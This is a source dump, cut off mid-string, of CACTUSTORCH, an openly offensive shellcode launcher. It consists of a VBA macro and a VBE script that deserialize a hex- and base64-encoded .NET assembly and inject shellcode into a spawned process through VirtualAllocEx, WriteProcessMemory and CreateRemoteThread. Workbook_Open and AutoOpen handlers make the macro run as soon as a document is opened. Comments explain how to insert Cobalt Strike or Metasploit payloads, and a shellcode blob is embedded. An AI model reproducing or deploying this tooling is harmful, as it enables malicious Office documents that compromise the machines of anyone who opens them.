78 | serialized_obj = serialized_obj & "68656D612E586D6C56616C756547657474657206130000004D53797374656D2E586D6C2C2056657273696F6E3D322E302E30"
79 | serialized_obj = serialized_obj & "2E302C2043756C747572653D6E65757472616C2C205075626C69634B6579546F6B656E3D6237376135633536313933346530"
80 | serialized_obj = serialized_obj & "383906140000000774617267657430090600000006160000001A53797374656D2E5265666C656374696F6E2E417373656D62"
81 | serialized_obj = serialized_obj & "6C790617000000044C6F61640A0F0C000000001E0000024D5A90000300000004000000FFFF0000B800000000000000400000"
82 | serialized_obj = serialized_obj & "000000000000000000000000000000000000000000000000000000000000000000800000000E1FBA0E00B409CD21B8014CCD"
83 | serialized_obj = serialized_obj & "21546869732070726F6772616D2063616E6E6F742062652072756E20696E20444F53206D6F64652E0D0D0A24000000000000"
84 | serialized_obj = serialized_obj & "00504500004C01030090D857590000000000000000E00022200B013000001600000006000000000000723500000020000000"
85 | serialized_obj = serialized_obj & "4000000000001000200000000200000400000000000000040000000000000000800000000200000000000003004085000010"
86 | serialized_obj = serialized_obj & "0000100000000010000010000000000000100000000000000000000000203500004F00000000400000900300000000000000"
87 | serialized_obj = serialized_obj & "0000000000000000000000006000000C00000000000000000000000000000000000000000000000000000000000000000000"
88 | serialized_obj = serialized_obj & "000000000000000000000000000000000000200000080000000000000000000000082000004800000000000000000000002E"
89 | serialized_obj = serialized_obj & "7465787400000078150000002000000016000000020000000000000000000000000000200000602E72737263000000900300"
90 | serialized_obj = serialized_obj & "00004000000004000000180000000000000000000000000000400000402E72656C6F6300000C000000006000000002000000"
91 | serialized_obj = serialized_obj & "1C00000000000000000000000000004000004200000000000000000000000000000000543500000000000048000000020005"
92 | serialized_obj = serialized_obj & "00F8210000281300000100000000000000000000000000000000000000000000000000000000000000000000000000000000"
93 | serialized_obj = serialized_obj & "0000000000000000000000000000001E02280F00000A2A13300A00070100000100001104281000000A0A1201068E69281100"
94 | serialized_obj = serialized_obj & "000A73090000060C08167D35000004720100007013047203000070281200000A6F1300000A163119721D000070281200000A"
95 | serialized_obj = serialized_obj & "722B00007003281400000A13042B17721D000070281200000A724100007003281400000A13041104141414171A7E1500000A"
96 | serialized_obj = serialized_obj & "14081203280100000626097B0400000413051205281600000A7257000070281700000A2C6E110516731100000A0720003000"
97 | serialized_obj = serialized_obj & "001F40280200000613061206281600000A7257000070281800000A2C0A1105162804000006262A1613071208068E69281100"
98 | serialized_obj = serialized_obj & "000A110511060611081107280300000626110516731100000A16110616731100000A1616731100000A2805000006262A7A02"
99 | serialized_obj = serialized_obj & "7E1500000A7D0200000402280F00000A0202281900000A7D010000042A0000133002006000000000000000027E1500000A7D"
100 | serialized_obj = serialized_obj & "2B000004027E1500000A7D2C000004027E1500000A7D2D000004027E1500000A7D38000004027E1500000A7D39000004027E"
101 | serialized_obj = serialized_obj & "1500000A7D3A000004027E1500000A7D3B00000402280F00000A0202281900000A7D2A0000042A42534A4201000100000000"
102 | serialized_obj = serialized_obj & "000C00000076322E302E35303732370000000005006C00000028070000237E0000940700004C09000023537472696E677300"
103 | serialized_obj = serialized_obj & "000000E01000005C000000235553003C1100001000000023475549440000004C110000DC01000023426C6F62000000000000"
104 | serialized_obj = serialized_obj & "0002000001571D02140902000000FA01330016000001000000170000000900000050000000090000001F0000001900000033"
105 | serialized_obj = serialized_obj & "000000120000000100000001000000050000000100000001000000070000000000990601000000000006005C0592070600C9"
106 | serialized_obj = serialized_obj & "05920706008A0460070F00B20700000600B204E10606003005E10606001105E1060600B005E10606007C05E10606009505E1"
107 | serialized_obj = serialized_obj & "060600C904E10606009E04730706007C0473070600F404E1060600AB08A90606006104A90606004D05A9060600B006A90606"
108 | serialized_obj = serialized_obj & "00CA08A90606005907A9060600BE08A90606006606A9060600840673070000000025000000000001000100010010006D0600"
109 | serialized_obj = serialized_obj & "003D00010001000A001000F80700003D00010008000A011000CE060000410004000900020100001B08000049000800090002"
110 | serialized_obj = serialized_obj & "010000360800004900270009000A001000060700003D002A000900020100006D04000049003C000A0002010000F306000049"
111 | serialized_obj = serialized_obj & "0045000A0006007D06FA00060044073F0006002404FD00060074083F000600E7033F000600C803FA000600BD03FA0006069E"
112 | serialized_obj = serialized_obj & "0300015680B20203015680C00203015680640003015680880203015680C20003015680530203015680F101030156801D0203"
113 | serialized_obj = serialized_obj & "015680050203015680A001030156800203030156805E0103015680480103015680E101030156804D02030156803102030156"
114 | serialized_obj = serialized_obj & "806A03030156808203030156809902030156801D03030156807601030156807500030156803D0003015680270103015680A8"
115 | serialized_obj = serialized_obj & "00030156803A0303015680B90103015680180103015680C60103015680E502030106069E0300015680910007015680720207"
116 | serialized_obj = serialized_obj & "010600A603FA000600EF033F00060017073F00060033043F0006004B03FA0006009A03FA000600E705FA000600EF05FA0006"
117 | serialized_obj = serialized_obj & "004708FA0006005508FA000600E404FA0006002E08FA000600E7080B0106000D000B01060019003F000600D2083F000600DC"
118 | serialized_obj = serialized_obj & "083F00060034073F0006069E0300015680DE020E015680EF000E0156809D010E015680D8020E015680D5010E0156800F010E"
119 | serialized_obj = serialized_obj & "01568094010E01568003010E0106069E0300015680E70012015680570012015680D500120156805803120156806902120156"
120 | serialized_obj = serialized_obj & "804F0312015680DD00120156806003120156801106120156802406120156803906120100000000800096202E001601010000"
121 | serialized_obj = serialized_obj & "00000080009620F3082A010B000000000080009620090935011000000000008000962063083F0115000000000080009120D4"
122 | serialized_obj = serialized_obj & "034501170050200000000086183E0706001E0058200000000086004D0450011E006B210000000086183E07060020008C2100"
123 | serialized_obj = serialized_obj & "00000086183E0706002000000001003B0400000200530400000300E40700000400D10700000500C107000006000B08000007"
124 | serialized_obj = serialized_obj & "00BC08000008001C0901000900040702000A00CC06000001001B04000002008B08000003000306000004006B0400000500B2"
125 | serialized_obj = serialized_obj & "08000001007408000002007D0800000300210700000400030600000500B50600000100740800000200FA0300000100740800"
126 | serialized_obj = serialized_obj & "000200D10700000300F705000004009508000005002807000006000B0800000700B20300000100020900000200010009003E"
127 | serialized_obj = serialized_obj & "07010011003E07060019003E070A0029003E07100031003E07100039003E07100041003E07100049003E07100051003E0710"
128 | serialized_obj = serialized_obj & "0059003E07100061003E07150069003E07100071003E07100089003E07060079003E070600990053062900A1003E070100A9"
129 | serialized_obj = serialized_obj & "0004042F00B10079063400B100A4083800A10012073F00A10064064200B1003B094600B1002F094600B9000A064C00090024"
130 | serialized_obj = serialized_obj & "005A00090028005F0009002C006400090030006900090034006E0009003800730009003C007800090040007D000900440082"
131 | serialized_obj = serialized_obj & "0009004800870009004C008C00090050009100090054009600090058009B0009005C00A00009006000A50009006400AA0009"
132 | serialized_obj = serialized_obj & "006800AF0009006C00B40009007000B90009007400BE0009007800C30009007C00C80009008000CD0009008400D200090088"
133 | serialized_obj = serialized_obj & "00D70009008C00DC0009009000E10009009400E60009009800EB000900A0005A000900A4005F000900F40096000900F8009B"
134 | serialized_obj = serialized_obj & "000900FC00F00009000001B90009000401E10009000801F50009000C01BE0009001001C300090018016E0009001C01730009"
135 | serialized_obj = serialized_obj & "0020017800090024017D00090028015A0009002C015F0009003001640009003401690009003801820009003C018700090040"
136 | serialized_obj = serialized_obj & "018C002E000B0056012E0013005F012E001B007E012E00230087012E002B0087012E00330098012E003B0098012E00430087"
137 | serialized_obj = serialized_obj & "012E004B0087012E00530098012E005B009E012E006300A4012E006B00CE0143005B009E01A30073005A00C30073005A0003"
138 | serialized_obj = serialized_obj & "0173005A00230173005A001A008C06000103002E00010000010500F30801000001070009090100000109006308010000010B"
139 | serialized_obj = serialized_obj & "00D4030100048000000100000000000000000000000000F70000000200000000000000000000005100A90300000000030002"
140 | serialized_obj = serialized_obj & "0004000200050002000600020007000200080002000900020000000000007368656C6C636F64653332006362526573657276"
141 | serialized_obj = serialized_obj & "656432006C70526573657276656432003C4D6F64756C653E0043726561746550726F6365737341004352454154455F425245"
142 | serialized_obj = serialized_obj & "414B415741595F46524F4D5F4A4F4200455845435554455F52454144004352454154455F53555350454E4445440050524F43"
143 | serialized_obj = serialized_obj & "4553535F4D4F44455F4241434B47524F554E445F454E44004455504C49434154455F434C4F53455F534F5552434500435245"
144 | serialized_obj = serialized_obj & "4154455F44454641554C545F4552524F525F4D4F4445004352454154455F4E45575F434F4E534F4C4500455845435554455F"
145 | serialized_obj = serialized_obj & "5245414457524954450045584543555445005245534552564500434143545553544F5243480057524954455F574154434800"
146 | serialized_obj = serialized_obj & "504859534943414C0050524F46494C455F4B45524E454C004352454154455F50524553455256455F434F44455F415554485A"
147 | serialized_obj = serialized_obj & "5F4C4556454C004352454154455F5348415245445F574F575F56444D004352454154455F53455041524154455F574F575F56"
148 | serialized_obj = serialized_obj & "444D0050524F434553535F4D4F44455F4241434B47524F554E445F424547494E00544F505F444F574E00474F004352454154"
149 | serialized_obj = serialized_obj & "455F4E45575F50524F434553535F47524F55500050524F46494C455F555345520050524F46494C455F534552564552004C41"
150 | serialized_obj = serialized_obj & "5247455F5041474553004352454154455F464F524345444F530049444C455F5052494F524954595F434C415353005245414C"
151 | serialized_obj = serialized_obj & "54494D455F5052494F524954595F434C41535300484947485F5052494F524954595F434C4153530041424F56455F4E4F524D"
152 | serialized_obj = serialized_obj & "414C5F5052494F524954595F434C4153530042454C4F575F4E4F524D414C5F5052494F524954595F434C415353004E4F4143"
153 | serialized_obj = serialized_obj & "43455353004455504C49434154455F53414D455F4143434553530044455441434845445F50524F4345535300435245415445"
154 | serialized_obj = serialized_obj & "5F50524F5445435445445F50524F434553530044454255475F50524F434553530044454255475F4F4E4C595F544849535F50"
155 | serialized_obj = serialized_obj & "524F4345535300524553455400434F4D4D4954004352454154455F49474E4F52455F53595354454D5F44454641554C540043"
156 | serialized_obj = serialized_obj & "52454154455F554E49434F44455F454E5649524F4E4D454E5400455854454E4445445F53544152545550494E464F5F505245"
157 | serialized_obj = serialized_obj & "53454E54004352454154455F4E4F5F57494E444F570064775800524541444F4E4C5900455845435554455F5752495445434F"
158 | serialized_obj = serialized_obj & "505900494E48455249545F504152454E545F414646494E49545900494E48455249545F43414C4C45525F5052494F52495459"
159 | serialized_obj = serialized_obj & "006477590076616C75655F5F006362006D73636F726C6962006C705468726561644964006477546872656164496400647750"
160 | serialized_obj = serialized_obj & "726F6365737349640043726561746552656D6F74655468726561640068546872656164006C70526573657276656400754578"
161 | serialized_obj = serialized_obj & "6974436F646500476574456E7669726F6E6D656E745661726961626C65006C7048616E646C650062496E686572697448616E"
162 | serialized_obj = serialized_obj & "646C65006C705469746C65006C704170706C69636174696F6E4E616D6500666C616D65006C70436F6D6D616E644C696E6500"
163 | serialized_obj = serialized_obj & "56616C75655479706500666C416C6C6F636174696F6E5479706500477569644174747269627574650044656275676761626C"
164 | serialized_obj = serialized_obj & "6541747472696275746500436F6D56697369626C6541747472696275746500417373656D626C795469746C65417474726962"
165 | serialized_obj = serialized_obj & "75746500417373656D626C7954726164656D61726B41747472696275746500647746696C6C41747472696275746500417373"
166 | serialized_obj = serialized_obj & "656D626C7946696C6556657273696F6E41747472696275746500417373656D626C79436F6E66696775726174696F6E417474"
167 | serialized_obj = serialized_obj & "72696275746500417373656D626C794465736372697074696F6E41747472696275746500466C616773417474726962757465"
168 | serialized_obj = serialized_obj & "00436F6D70696C6174696F6E52656C61786174696F6E7341747472696275746500417373656D626C7950726F647563744174"
169 | serialized_obj = serialized_obj & "7472696275746500417373656D626C79436F7079726967687441747472696275746500417373656D626C79436F6D70616E79"
170 | serialized_obj = serialized_obj & "4174747269627574650052756E74696D65436F6D7061746962696C6974794174747269627574650064775853697A65006477"
171 | serialized_obj = serialized_obj & "5953697A65006477537461636B53697A6500647753697A650053697A654F660047554152445F4D6F646966696572666C6167"
172 | serialized_obj = serialized_obj & "004E4F43414348455F4D6F646966696572666C6167005752495445434F4D42494E455F4D6F646966696572666C6167004672"
173 | serialized_obj = serialized_obj & "6F6D426173653634537472696E6700546F537472696E6700636163747573546F726368006765745F4C656E677468004D6172"
174 | serialized_obj = serialized_obj & "7368616C006B65726E656C33322E646C6C00434143545553544F5243482E646C6C0053797374656D00456E756D006C704E75"
175 | serialized_obj = serialized_obj & "6D6265724F6642797465735772697474656E006C7050726F63657373496E666F726D6174696F6E0053797374656D2E526566"
176 | serialized_obj = serialized_obj & "6C656374696F6E004D656D6F727950726F74656374696F6E006C7053746172747570496E666F005A65726F006C704465736B"
177 | serialized_obj = serialized_obj & "746F7000627566666572006C70506172616D6574657200685374644572726F72002E63746F72006C70536563757269747944"
178 | serialized_obj = serialized_obj & "657363726970746F7200496E745074720053797374656D2E446961676E6F73746963730053797374656D2E52756E74696D65"
179 | serialized_obj = serialized_obj & "2E496E7465726F7053657276696365730053797374656D2E52756E74696D652E436F6D70696C657253657276696365730044"
180 | serialized_obj = serialized_obj & "6562756767696E674D6F6465730062496E686572697448616E646C6573006C7054687265616441747472696275746573006C"
181 | serialized_obj = serialized_obj & "7050726F6365737341747472696275746573005365637572697479417474726962757465730064774372656174696F6E466C"
182 | serialized_obj = serialized_obj & "6167730043726561746550726F63657373466C616773006477466C616773004475706C69636174654F7074696F6E73006477"
183 | serialized_obj = serialized_obj & "58436F756E74436861727300647759436F756E744368617273005465726D696E61746550726F63657373006850726F636573"
184 | serialized_obj = serialized_obj & "73006C704261736541646472657373006C7041646472657373006C7053746172744164647265737300436F6E636174004F62"
185 | serialized_obj = serialized_obj & "6A65637400666C50726F74656374006C70456E7669726F6E6D656E7400436F6E766572740068537464496E70757400685374"
186 | serialized_obj = serialized_obj & "644F7574707574007753686F7757696E646F77005669727475616C416C6C6F6345780062696E61727900577269746550726F"
187 | serialized_obj = serialized_obj & "636573734D656D6F7279006C7043757272656E744469726563746F7279006F705F457175616C697479006F705F496E657175"
188 | serialized_obj = serialized_obj & "616C6974790000000000010019500072006F006700720061006D0057003600340033003200000D770069006E006400690072"
189 | serialized_obj = serialized_obj & "0000155C0053007900730057004F005700360034005C0000155C00530079007300740065006D00330032005C000003300000"
190 | serialized_obj = serialized_obj & "00458F9BCEE2EAC44F9A4920332ECA615E00042001010803200001052001011111042001010E04200101020E07091D051812"
191 | serialized_obj = serialized_obj & "1C11100E181808180500011D050E0400010E0E032000080600030E0E0E0E0206180320000E050002020E0E040001081C08B7"
192 | serialized_obj = serialized_obj & "7A5C561934E08904010000000402000000040400000004080000000410000000042000000004400000000480000000040001"
193 | serialized_obj = serialized_obj & "0000040002000004000400000400080000040010000004002000000400400000040080000004000001000400000200040000"
194 | serialized_obj = serialized_obj & "0400040000080004000010000400002000040000000104000000020400000004040000000804000000100400000020040000"
195 | serialized_obj = serialized_obj & "00400400000080040030000004000040000206080206020206090306111403061118020606030611200306112413000A180E"
196 | serialized_obj = serialized_obj & "0E120C120C021114180E121C1011100A000518181818112011240900050218181D0518080500020218090A00071818180918"
197 | serialized_obj = serialized_obj & "180918052002010E0E0801000800000000001E01000100540216577261704E6F6E457863657074696F6E5468726F77730108"
198 | serialized_obj = serialized_obj & "01000200000000001001000B434143545553544F52434800000501000000000501000100002901002435363539386631632D"
199 | serialized_obj = serialized_obj & "366438382D343939342D613339322D61663333376162653537373700000C010007312E302E302E3000000048350000000000"
200 | serialized_obj = serialized_obj & "00000000006235000000200000000000000000000000000000000000000000000054350000000000000000000000005F436F"
201 | serialized_obj = serialized_obj & "72446C6C4D61696E006D73636F7265652E646C6C0000000000FF250020001000000000000000000000000000000000000000"
202 | serialized_obj = serialized_obj & "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000"
203 | serialized_obj = serialized_obj & "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000"
204 | serialized_obj = serialized_obj & "0000000000000000000000000000000000000000000000000000000000000001001000000018000080000000000000000000"
205 | serialized_obj = serialized_obj & "0000000000010001000000300000800000000000000000000000000000010000000000480000005840000034030000000000"
206 | serialized_obj = serialized_obj & "0000000000340334000000560053005F00560045005200530049004F004E005F0049004E0046004F0000000000BD04EFFE00"
207 | serialized_obj = serialized_obj & "000100000001000000000000000100000000003F000000000000000400000002000000000000000000000000000000440000"
208 | serialized_obj = serialized_obj & "000100560061007200460069006C00650049006E0066006F00000000002400040000005400720061006E0073006C00610074"
209 | serialized_obj = serialized_obj & "0069006F006E00000000000000B00494020000010053007400720069006E006700460069006C00650049006E0066006F0000"
210 | serialized_obj = serialized_obj & "0070020000010030003000300030003000340062003000000030000C00010043006F006D006D0065006E0074007300000043"
211 | serialized_obj = serialized_obj & "004100430054005500530054004F00520043004800000022000100010043006F006D00700061006E0079004E0061006D0065"
212 | serialized_obj = serialized_obj & "00000000000000000040000C000100460069006C0065004400650073006300720069007000740069006F006E000000000043"
213 | serialized_obj = serialized_obj & "004100430054005500530054004F005200430048000000300008000100460069006C006500560065007200730069006F006E"
214 | serialized_obj = serialized_obj & "000000000031002E0030002E0030002E003000000040001000010049006E007400650072006E0061006C004E0061006D0065"
215 | serialized_obj = serialized_obj & "00000043004100430054005500530054004F005200430048002E0064006C006C0000003C000C0001004C006500670061006C"
216 | serialized_obj = serialized_obj & "0043006F007000790072006900670068007400000043004100430054005500530054004F0052004300480000002A00010001"
217 | serialized_obj = serialized_obj & "004C006500670061006C00540072006100640065006D00610072006B00730000000000000000004800100001004F00720069"
218 | serialized_obj = serialized_obj & "00670069006E0061006C00460069006C0065006E0061006D006500000043004100430054005500530054004F005200430048"
219 | serialized_obj = serialized_obj & "002E0064006C006C00000038000C000100500072006F0064007500630074004E0061006D0065000000000043004100430054"
220 | serialized_obj = serialized_obj & "005500530054004F005200430048000000340008000100500072006F006400750063007400560065007200730069006F006E"
221 | serialized_obj = serialized_obj & "00000031002E0030002E0030002E003000000038000800010041007300730065006D0062006C007900200056006500720073"
222 | serialized_obj = serialized_obj & "0069006F006E00000031002E0030002E0030002E003000000000000000000000000000000000000000000000000000000000"
223 | serialized_obj = serialized_obj & "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000"
224 | serialized_obj = serialized_obj & "0000000000000000000000000000000000000000000000000000000000000000000000000000000000003000000C00000074"
225 | serialized_obj = serialized_obj & "3500000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000"
226 | serialized_obj = serialized_obj & "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000"
227 | serialized_obj = serialized_obj & "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000"
228 | serialized_obj = serialized_obj & "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000"
229 | serialized_obj = serialized_obj & "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000"
230 | serialized_obj = serialized_obj & "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000"
231 | serialized_obj = serialized_obj & "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000"
232 | serialized_obj = serialized_obj & "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000"
233 | serialized_obj = serialized_obj & "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000"
234 | serialized_obj = serialized_obj & "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000"
235 | serialized_obj = serialized_obj & "000000010D00000004000000091700000009060000000916000000061A0000002753797374656D2E5265666C656374696F6E"
236 | serialized_obj = serialized_obj & "2E417373656D626C79204C6F616428427974655B5D29080000000A0B"
237 |
238 | entry_class = "cactusTorch"
239 |
240 | Dim stm As Object, fmt As Object, al As Object
241 | Set stm = CreateObject("System.IO.MemoryStream")
242 | Set fmt = CreateObject("System.Runtime.Serialization.Formatters.Binary.BinaryFormatter")
243 | Set al = CreateObject("System.Collections.ArrayList")
244 |
245 | Dim dec
246 | dec = decodeHex(serialized_obj)
247 |
248 | For Each i In dec
249 | stm.WriteByte i
250 | Next i
251 |
252 | stm.Position = 0
253 |
254 | Dim n As Object, d As Object, o As Object
255 | Set n = fmt.SurrogateSelector
256 | Set d = fmt.Deserialize_2(stm)
257 | al.Add n
258 |
259 | Set o = d.DynamicInvoke(al.ToArray()).CreateInstance(entry_class)
260 | o.flame binary,code
261 | End Function
262 |
263 | Sub Workbook_Open()
264 | Init
265 | Run
266 | End Sub
267 |
268 | Sub AutoOpen()
269 | Init
270 | Run
271 | End Sub
272 |
273 | Sub Auto_Open()
274 | AutoOpen
275 | End Sub
276 |
--------------------------------------------------------------------------------
/CACTUSTORCH.vbe:
--------------------------------------------------------------------------------
1 | ' ( ) ( )
2 | ' ( ( ( * ) )\ ) * ) ( /( )\ ) ( ( /(
3 | ' )\ )\ )\ ` ) /( ( (()/(` ) /( )\())(()/( )\ )\())
4 | ' (((_|(((_)( (((_) ( )(_)) )\ /(_))( )(_)|(_)\ /(_)|((_)((_)\
5 | ' )\___)\ _ )\ )\___(_(_())_ ((_|_)) (_(_()) ((_)(_)) )\___ _((_)
6 | '((/ __(_)_\(_|(/ __|_ _| | | / __||_ _| / _ \| _ ((/ __| || |
7 | ' | (__ / _ \ | (__ | | | |_| \__ \ | | | (_) | /| (__| __ |
8 | ' \___/_/ \_\ \___| |_| \___/|___/ |_| \___/|_|_\ \___|_||_|
9 | '
10 | ' Author: Vincent Yiu (@vysecurity)
11 | ' Credits:
12 | ' - @cn33liz: Inspiration with StarFighter
13 | ' - @tiraniddo: James Forshaw for DotNet2JScript
14 | ' - @armitagehacker: Raphael Mudge for idea of selecting 32 bit version on 64 bit architecture machines for injection into
15 |
16 | ' A JavaScript and VBScript shellcode launcher. This will spawn a 32 bit version of the binary specified and inject shellcode into it.
17 |
18 | ' Usage:
19 | ' Choose a binary you want to inject into, default "rundll32.exe", you can use notepad.exe, calc.exe for example...
20 | ' Generate a 32 bit raw shellcode in whatever framework you want. Tested: Cobalt Strike, Metasploit Framework
21 | ' Run: cat payload.bin | base64 -w 0
22 | ' Copy the base64 encoded payload into the code variable below.
23 |
24 | ' Replace with binary name that you want to inject into. This can be anything that exists both in SYSWOW64 and SYSTEM32
25 | Dim binary : binary = "rundll32.exe"
26 |
27 | ' Base64 encoded 32 bit shellcode
28 | Dim code : code = "TVroAAAAAFtSRVWJ5YHDcoAAAP/TicNXaAQAAABQ/9Bo8LWiVmgFAAAAUP/TAAAAAAAAAAAAAAAAAAAA8AAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAACf0hwW27NyRduzckXbs3JFZvzkRdqzckXF4fZF8rNyRcXh50XIs3JFxeHxRVqzckX8dQlF1LNyRduzc0UGs3JFxeH7RWKzckXF4eBF2rNyRcXh40Xas3JFUmljaNuzckUAAAAAAAAAAAAAAAAAAAAAUEUAAEwBBQBOViNZAAAAAAAAAADgAAKhCwEJAABCAgAA4gAAAAAAAFFvAQAAEAAAAGACAAAAABAAEAAAAAIAAAUAAAAAAAAABQAAAAA"
29 |
30 | ' ---------- DO NOT EDIT BELOW HERE -----------
31 |
32 | Sub Debug(s)
33 | End Sub
34 | Sub SetVersion
35 | End Sub
36 | Function Base64ToStream(b)
37 | Dim enc, length, ba, transform, ms
38 | Set enc = CreateObject("System.Text.ASCIIEncoding")
39 | length = enc.GetByteCount_2(b)
40 | Set transform = CreateObject("System.Security.Cryptography.FromBase64Transform")
41 | Set ms = CreateObject("System.IO.MemoryStream")
42 | ms.Write transform.TransformFinalBlock(enc.GetBytes_4(b), 0, length), 0, ((length / 4) * 3)
43 | ms.Position = 0
44 | Set Base64ToStream = ms
45 | End Function
46 |
47 | Sub Run
48 | Dim s, entry_class
49 | s = "AAEAAAD/////AQAAAAAAAAAEAQAAACJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVy"
50 | s = s & "AwAAAAhEZWxlZ2F0ZQd0YXJnZXQwB21ldGhvZDADAwMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXph"
51 | s = s & "dGlvbkhvbGRlcitEZWxlZ2F0ZUVudHJ5IlN5c3RlbS5EZWxlZ2F0ZVNlcmlhbGl6YXRpb25Ib2xk"
52 | s = s & "ZXIvU3lzdGVtLlJlZmxlY3Rpb24uTWVtYmVySW5mb1NlcmlhbGl6YXRpb25Ib2xkZXIJAgAAAAkD"
53 | s = s & "AAAACQQAAAAEAgAAADBTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyK0RlbGVnYXRl"
54 | s = s & "RW50cnkHAAAABHR5cGUIYXNzZW1ibHkGdGFyZ2V0EnRhcmdldFR5cGVBc3NlbWJseQ50YXJnZXRU"
55 | s = s & "eXBlTmFtZQptZXRob2ROYW1lDWRlbGVnYXRlRW50cnkBAQIBAQEDMFN5c3RlbS5EZWxlZ2F0ZVNl"
56 | s = s & "cmlhbGl6YXRpb25Ib2xkZXIrRGVsZWdhdGVFbnRyeQYFAAAAL1N5c3RlbS5SdW50aW1lLlJlbW90"
57 | s = s & "aW5nLk1lc3NhZ2luZy5IZWFkZXJIYW5kbGVyBgYAAABLbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAu"
58 | s = s & "MCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5BgcAAAAH"
59 | s = s & "dGFyZ2V0MAkGAAAABgkAAAAPU3lzdGVtLkRlbGVnYXRlBgoAAAANRHluYW1pY0ludm9rZQoEAwAA"
60 | s = s & "ACJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyAwAAAAhEZWxlZ2F0ZQd0YXJnZXQw"
61 | s = s & "B21ldGhvZDADBwMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcitEZWxlZ2F0ZUVu"
62 | s = s & "dHJ5Ai9TeXN0ZW0uUmVmbGVjdGlvbi5NZW1iZXJJbmZvU2VyaWFsaXphdGlvbkhvbGRlcgkLAAAA"
63 | s = s & "CQwAAAAJDQAAAAQEAAAAL1N5c3RlbS5SZWZsZWN0aW9uLk1lbWJlckluZm9TZXJpYWxpemF0aW9u"
64 | s = s & "SG9sZGVyBgAAAAROYW1lDEFzc2VtYmx5TmFtZQlDbGFzc05hbWUJU2lnbmF0dXJlCk1lbWJlclR5"
65 | s = s & "cGUQR2VuZXJpY0FyZ3VtZW50cwEBAQEAAwgNU3lzdGVtLlR5cGVbXQkKAAAACQYAAAAJCQAAAAYR"
66 | s = s & "AAAALFN5c3RlbS5PYmplY3QgRHluYW1pY0ludm9rZShTeXN0ZW0uT2JqZWN0W10pCAAAAAoBCwAA"
67 | s = s & "AAIAAAAGEgAAACBTeXN0ZW0uWG1sLlNjaGVtYS5YbWxWYWx1ZUdldHRlcgYTAAAATVN5c3RlbS5Y"
68 | s = s & "bWwsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdh"
69 | s = s & "NWM1NjE5MzRlMDg5BhQAAAAHdGFyZ2V0MAkGAAAABhYAAAAaU3lzdGVtLlJlZmxlY3Rpb24uQXNz"
70 | s = s & "ZW1ibHkGFwAAAARMb2FkCg8MAAAAAB4AAAJNWpAAAwAAAAQAAAD//wAAuAAAAAAAAABAAAAAAAAA"
71 | s = s & "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAAAAADh+6DgC0Cc0huAFMzSFUaGlzIHByb2dy"
72 | s = s & "YW0gY2Fubm90IGJlIHJ1biBpbiBET1MgbW9kZS4NDQokAAAAAAAAAFBFAABMAQMAkNhXWQAAAAAA"
73 | s = s & "AAAA4AAiIAsBMAAAFgAAAAYAAAAAAAByNQAAACAAAABAAAAAAAAQACAAAAACAAAEAAAAAAAAAAQA"
74 | s = s & "AAAAAAAAAIAAAAACAAAAAAAAAwBAhQAAEAAAEAAAAAAQAAAQAAAAAAAAEAAAAAAAAAAAAAAAIDUA"
75 | s = s & "AE8AAAAAQAAAkAMAAAAAAAAAAAAAAAAAAAAAAAAAYAAADAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
76 | s = s & "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAIAAAAAAAAAAAAAAAIIAAASAAAAAAAAAAA"
77 | s = s & "AAAALnRleHQAAAB4FQAAACAAAAAWAAAAAgAAAAAAAAAAAAAAAAAAIAAAYC5yc3JjAAAAkAMAAABA"
78 | s = s & "AAAABAAAABgAAAAAAAAAAAAAAAAAAEAAAEAucmVsb2MAAAwAAAAAYAAAAAIAAAAcAAAAAAAAAAAA"
79 | s = s & "AAAAAABAAABCAAAAAAAAAAAAAAAAAAAAAFQ1AAAAAAAASAAAAAIABQD4IQAAKBMAAAEAAAAAAAAA"
80 | s = s & "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgIoDwAACioT"
81 | s = s & "MAoABwEAAAEAABEEKBAAAAoKEgEGjmkoEQAACnMJAAAGDAgWfTUAAARyAQAAcBMEcgMAAHAoEgAA"
82 | s = s & "Cm8TAAAKFjEZch0AAHAoEgAACnIrAABwAygUAAAKEwQrF3IdAABwKBIAAApyQQAAcAMoFAAAChME"
83 | s = s & "EQQUFBQXGn4VAAAKFAgSAygBAAAGJgl7BAAABBMFEgUoFgAACnJXAABwKBcAAAosbhEFFnMRAAAK"
84 | s = s & "ByAAMAAAH0AoAgAABhMGEgYoFgAACnJXAABwKBgAAAosChEFFigEAAAGJioWEwcSCAaOaSgRAAAK"
85 | s = s & "EQURBgYRCBEHKAMAAAYmEQUWcxEAAAoWEQYWcxEAAAoWFnMRAAAKKAUAAAYmKnoCfhUAAAp9AgAA"
